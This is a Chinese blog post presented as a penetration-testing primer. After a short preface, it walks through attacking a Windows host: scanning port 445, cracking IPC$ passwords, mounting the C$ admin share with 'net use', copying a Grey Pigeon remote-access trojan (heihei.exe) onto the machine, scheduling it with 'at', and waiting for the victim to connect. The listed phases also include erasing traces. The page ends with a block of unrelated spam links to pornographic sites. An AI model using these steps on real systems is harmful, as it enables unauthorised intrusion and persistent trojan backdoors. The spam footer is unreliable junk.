愚公系列2021年12月 網絡工程-滲透測試

      網友投稿 698 2022-05-28

      前言

      滲透測試,是為了證明網絡防御按照預期計劃正常運行而提供的一種機制。不妨假設,你的公司定期更新安全策略和程序,時時給系統打補丁,并采用了漏洞掃描器等工具,以確保所有補丁都已打上。如果你早已做到了這些,為什么還要請外方進行審查或滲透測試呢?因為,滲透測試能夠獨立地檢查你的網絡策略,換句話說,就是給你的系統安了一雙眼睛。而且,進行這類測試的,都是尋找網絡系統安全漏洞的專業人士。

      提示:以下是本篇文章正文內容,下面案例可供參考

      一:測試步驟

      1.授權

      2.信息收集

      nslookup whois

      【愚公系列】2021年12月 網絡工程-滲透測試

      3.掃描

      namp=ip范圍 端口 80(IIS,apache,什么網站)scanport

      高級掃描:如IIS漏洞2003-IIS6.0 2008IIS7.0

      掃描網站漏洞()

      4.利用

      5.提權(shell環境、桌面環境、最高權限)

      6.滅跡

      7.留后門

      8.滲透測試報告

      二、具體流程

      1.scanport掃描445端口

      2.利用IPC$: 進行破解:NTscan

      3.相關命令行

      ===================================== net use f: \\10.1.1.2\share 密碼 /user:用戶 net use f: /del net use * /del net use f: \\10.1.1.2\c$ 密碼 /user:用戶 net use \\10.1.1.2\ipc$ 密碼 /user:用戶 ==========================================

      4.制作

      利用光盤上的灰鴿子軟件

      5.植入(留后門)

      copy d:\heihei.exe \\10.1.1.2\c$

      6.設置計劃任務自動執行:

      net time \\10.1.1.2 at \\10.1.1.2 11:11 "c:\heihei.exe"

      7.等待客戶機上線

      網絡

      版權聲明:本文內容由網絡用戶投稿,版權歸原作者所有,本站不擁有其著作權,亦不承擔相應法律責任。如果您發現本站中有涉嫌抄襲或描述失實的內容,請聯系我們jiasou666@gmail.com 處理,核實后本網站將在24小時內刪除侵權內容。

      上一篇:利用Python線程池充分發揮華為云DLS的性能
      下一篇:【Free Style】成功搭建-基于Docker+Seafile搭建私人云存儲
      相關文章
      亚洲美女免费视频| 在线综合亚洲欧洲综合网站| 亚洲人成色4444在线观看| 亚洲导航深夜福利| 亚洲AV无码专区电影在线观看| 亚洲狠狠婷婷综合久久久久| 亚洲综合另类小说色区| 亚洲伊人色欲综合网| 亚洲精品二区国产综合野狼| 精品亚洲一区二区| 久久精品国产亚洲av成人| 亚洲AV福利天堂一区二区三 | 亚洲 日韩 色 图网站| 亚洲色精品VR一区区三区| 亚洲欧美自偷自拍另类视 | 久久久久久久综合日本亚洲| 亚洲色欲色欲www在线丝| 久久精品国产亚洲av成人| 911精品国产亚洲日本美国韩国| 亚洲精品韩国美女在线| 亚洲一区在线视频| 亚洲中文无码卡通动漫野外 | 狠狠综合亚洲综合亚洲色| 亚洲AV无码一区二三区| 久久亚洲国产精品123区| 亚洲精品乱码久久久久久按摩| 亚洲国产精品特色大片观看完整版| 久久精品国产亚洲AV麻豆~ | 亚洲成AⅤ人影院在线观看| 国产亚洲成人久久| 无码乱人伦一区二区亚洲| 亚洲成a人片7777| 亚洲精品女同中文字幕| 亚洲精品视频久久久| 狠狠色伊人亚洲综合成人| 亚洲精品视频在线免费| 亚洲中文字幕无码爆乳app| 国产精品亚洲AV三区| 亚洲av无码天堂一区二区三区 | 欧洲亚洲综合一区二区三区| 亚洲性在线看高清h片|